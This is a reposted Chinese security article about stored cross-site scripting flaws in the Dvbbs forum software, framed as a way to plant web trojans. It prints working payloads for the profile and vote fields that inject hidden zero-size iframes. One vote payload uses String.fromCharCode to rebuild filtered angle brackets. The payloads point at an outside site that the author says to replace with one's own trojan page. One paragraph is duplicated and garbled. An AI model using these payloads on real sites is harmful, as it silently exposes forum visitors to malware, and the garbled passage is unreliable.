代码驿站移动版
频道导航
HTML/Xhtml
CSS
JavaScript
HTML5
PHP教程
ASP.NET
正则表达式
AJAX
ThinkPHP
Yii
MySQL
MariaDB
Oracle
MongoDB
Redis
DedeCMS
PHPCMS
帝国CMS
WordPress
Discuz
其它CMS
Zend Studio
Sublime
Notepad
Dreamweaver
Windows
Linux
Nginx
Apache
IIS
CentOS
Ubuntu
Debian
网站优化
工具资源
PHP源码
ASP.NET源码
其它源码
图标素材
按钮素材
字体素材
DedeCMS模板
帝国CMS模板
PHPCMS模板
WordPress模板
Discuz!模板
单页模板
开发软件下载
服务器软件下载
广告投放
联系我们
版权申明
软件编程
网页前端
移动开发
数据库
服务器
脚本语言
PHP代码
JAVA代码
Python代码
Android代码
当前位置:
主页
> >
新思路现动网新漏洞
时间:2020-10-15 23:16:45 | 栏目: | 点击:次
作者:优格GXU 文章来源:邪恶八进制信息安全团队
文章作者:优格[GXU] (www.wuzhou.org)
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
原文下载:http://www.wuzhou.org/dvbbs.doc
前段时间focn等人发现了动网的提权漏洞,这漏洞可是闹得天翻地覆的,连当当网论坛也给挂上马了。正是这个漏洞盖住了动网的其他漏洞,使动网的其他漏洞少为人知。
相信大家都看过《终结动网最新挂马方法!》的文章了,其实这个漏洞已经出现了大概半月了,后来才被公布出来。利用方法就是在“修改个人联系方法”中的“个人主页”写入代码:
</Script><IfraMe height=0 width=0 src="http://www.wuzhou.org"></IfraMe>
在MSN中写入代码:
<Script Language=JavaScript>var actioninfo3='单帖屏蔽'
其中木马。这样,我们发贴或者回帖,只要有人访问这个帖子就会跳转访问我们的木马。其原理就是对原代码进行欺骗,今天主要说的是动网的另一个挂马方法-----投票挂马。通过测试,发现动网的所有版本均存在这个漏洞。 href="http://www.wuzhou.org为你的网页木马。这样,我们发贴或者回帖,只要有人访问这个帖子就会跳转访问我们的木马。其原理就是对原代码进行欺骗,今天主要说的是动网的另一个挂马方法-----投票挂马。通过测试,发现动网的所有版本均存在这个漏洞。/" target=_blank>http://www.wuzhou.org为你的网页木马。这样,我们发贴或者回帖,只要有人访问这个帖子就会跳转访问我们的木马。其原理就是对原代码进行欺骗,今天主要说的是动网的另一个挂马方法-----投票挂马。通过测试,发现动网的所有版本均存在这个漏洞。
首先,我们发表一个投票看看。如图1
我们看一下源文件:
<Script Language=JavaScript>var vote='ssssssssss';var votenum='0';var votetype='0';var voters='0';</Script>
其中ssssssssss是我们自由写入的,那么我们能不能对源文件进行欺骗,从而让它运行我们的代码呢?打个比方,一个括号:(),当我们在()内写进)和(,那就变成了两个括号。道理是相同的,我们也可以这样进行代码欺骗。我们在发表投票中写入:
';var votenum='0';var votetype='0';var voters='0';</Script><iframe src="http://www.wuzhou.org/" width="0" height="0"></iframe><Script Language=JavaScript>var vote='
在这里顺便说一下,动网的投票功能没有进行严密的过滤,当写入的投票项目为网页代码时,代码照样可以执行,而且写入的代码并不按照它所说的“每行一个投票项目,最多10个”,并没有分行。发表投票后,查看源文件:
<Script Language=JavaScript>var vote='';var votenum='0';var votetype='0';var voters='0';</Script><iframe src="http://www.wuzhou.org/" width="0" height="0"></iframe><Script Language=JavaScript>var vote='';var votenum='0';var votetype='0';var voters='0';</Script>
代码是无法执行的,动网进行了过滤。再次饶过思路,动网只是对<和>进行过滤,对+'/等符号没有过滤。再次在投票那写入代码:
';document.all.popmenu.innerHTML=document.all.popmenu.innerHTML+String.fromCharCode(60)+'IFRAME frameBorder=0 height=0 marginHeight=0 marginWidth=0 scrolling=no src=http://www.wuzhou.org width=0'+String.fromCharCode(62)+String.fromCharCode(60)+'/IFRAME'+String.fromCharCode(62);var vote='1
发表后成功跳转了www.wuzhou.org这个站。如果我们把站改成我们的网页木马,那么一个木马贴就这样完成了。其实这只是动网代码欺骗的一小部分,还有不少的地方可以进行代码欺骗,比如用户头像,联系方法等。
后记:现在很多的程序作者并没有看到到代码欺骗这安全危害,在我看的很多网站程序,不管是asp还是php的,都有许多程序可以进行代码欺骗,希望这篇文章能起到抛砖引玉的效果,让各位朋友找到更多的漏洞。
您可能感兴趣的文章:
R语言ggplot2边框背景去除的实现
使用“新网”接口的用户注意问题
正则表达式直接在EXCEL中使用的详细步骤
常见木马的手工清除方法
php半小时精通正则表达式
相关文章
05-16
Powershell小技巧之通过EventLog查看近期电脑开机和关机时间
05-16
IDEA配置GIT的详细教程
05-16
提高页面加载速度的几个方法小结
05-16
易语言设置组合框项目数值的方法
05-16
VMware Workstation虚拟机安装操作方法
JQuery
VUE
AngularJS
MSSql
MySQL
MongoDB
Redis
Linux
Tomcat
Nginx
网站首页
广告投放
联系我们
版权申明
联系站长